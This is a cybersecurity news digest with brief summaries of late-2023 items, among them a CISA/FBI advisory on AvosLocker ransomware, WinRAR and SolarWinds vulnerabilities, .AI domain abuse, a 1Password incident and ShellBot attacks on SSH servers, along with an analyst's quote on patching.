The AvosLocker ransomware gang has been linked to attacks against critical infrastructure sectors in the U.S., with some of them detected as recently as May 2023. That's according to a new joint cybersecurity advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) detailing the ransomware-as-a-service (RaaS) operation's tactics, techniques, and procedures (TTPs). (The Hacker News)
| “The barrier for new and emerging threat actors to cross to become proficient or even moderately capable has diminished significantly. While their techniques and capabilities are limited they are much more focused on smash-and-grab techniques to exploit vulnerabilities and deploy their ransomware. While this type of activity is increasing, the vast majority of incidents are due to larger, more sophisticated groups exploiting unmanaged devices and applications within corporate networks as well as capitalizing on living-off-the-land techniques to further mask the threat actor’s presence in the environment. That being said, maintaining a proper and concise inventory of devices and applications that are approved and ensuring proper patching is paramount to limit the potential of compromise.” – Craig Flynn, SOC Analyst Lead at Ingalls Information Security |
CVE-2023-38831 has been patched in August 2023, along with another high-severity RCE vulnerability (CVE-2023-40477). Exploited as a zero-day by cybercriminals since April 2023, the vulnerability is now also being used by state-sponsored hacking groups. (Help Net Security)
Third parties are registering brands under the .AI domain to launch phishing attacks or other types of brand abuse. Almost half of Forbes Global 2000 companies do not have control over their branded artificial intelligence (.AI) domain names, which are registered by third parties. That's according to the 2023 Domain Security Report from CSC, which revealed that cybercriminals are exploiting AI's popularity by attempting to register the domains of trusted brands for malicious activity. This is emphasized by a 350% year-over-year increase in domain dispute cases involving .AI extensions in 2023 from companies who discovered that .AI domains using their brands were misappropriated by third parties, according to the research. (CSO)
Eight newly discovered vulnerabilities in the SolarWinds Access Rights Manager Tool (ARM) — including three deemed to be of critical severity — could open the door for attackers to gain the highest levels of privilege in any unpatched systems. (Dark Reading)
On October 23, 2023, 1Password’s CTO, Pedro Canahuati, disclosed the incident, stating that threat actors were unable to access or steal user data during the attack. (HACKREAD)
The threat actors behind ShellBot are leveraging IP addresses transformed into their hexadecimal notation to infiltrate poorly managed Linux SSH servers and deploy the DDoS malware. (The Hacker News)